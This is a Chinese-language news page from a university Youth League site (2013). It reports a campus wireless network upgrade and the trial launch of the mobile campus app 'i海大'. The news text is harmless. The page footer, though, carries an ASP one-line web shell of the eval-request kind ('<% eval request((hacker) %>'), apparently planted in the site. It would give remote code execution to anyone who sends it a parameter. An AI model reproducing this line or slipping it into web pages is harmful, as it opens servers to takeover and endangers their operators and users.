当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
“即知即改”系列报道之十一:升级校园无线网络,建设移动校园平台
[2013年11月19日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

     教育实践活动开展以来,现代信息与教育技术中心本着以师生为本的原则,认真梳理师生意见,努力以实际行动解师生烦恼,让群众满意。针对师生对于网络方面反映的相关问题在第一时间进行了“拓网络”、“建平台”等整改方案。

    随着信息技术不断发展,近年来我校师生对无线网络的需求日益增加。而我校学院楼区域的无线网络自2008年建成后,五年来未进行大的升级改造,其速度慢、信号弱、盲点多等诸多问题日益显现。

    针对师生对学院楼区域无线网络的使用需求,现教中心一方面继续提高图文信息中心、公共教学楼等热点区域无线网络覆盖率,另一方面立即启动学院楼区域无线网络的升级工作,以解师生的燃眉之急。升级后的区域无线AP(Access Point)数量将是原来的5倍,无线网络的最大并发用户数可达到6500个,校内带宽可达千兆。届时我校学院楼区域的无线网络覆盖范围将进一步拓展,无线网络带宽将有效增加,师生的无线上网体验将得到极大的改善。

    而随着我校校园内无线网络的逐渐完善、移动设备的普及,我校师生对移动数字校园平台的需求也日益明确。为了更好地满足师生们的需求,现教中心着手建设移动数字校园平台,打造一款方便师生的移动应用系统。经开发和调试,上海海洋大学移动校园平台“i海大”已于上个月上线试运行。师生可通过各种移动设备快捷访问校园网站、查询各类数据信息、处理简单业务等,让师生享受到随身携带的数字校园平台服务。下一步,现教中心将继续听取师生意见后,把更多的信息系统应用拓展到移动校园平台上。

    以提升学校信息化建设与服务的整体水平为出发点,以师生满意度为衡量标准,现代信息与教育技术中心结合已征求到的意见建议“即知即改”,在小事中为师生谋得真实惠。

 

关闭窗口

上一篇:“即知即改”系列报道之十:加强管理,注重引导,推进学风建设

下一篇:“即知即改”系列报道之十二:博士待遇逐步改善,着眼未来长远发展
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>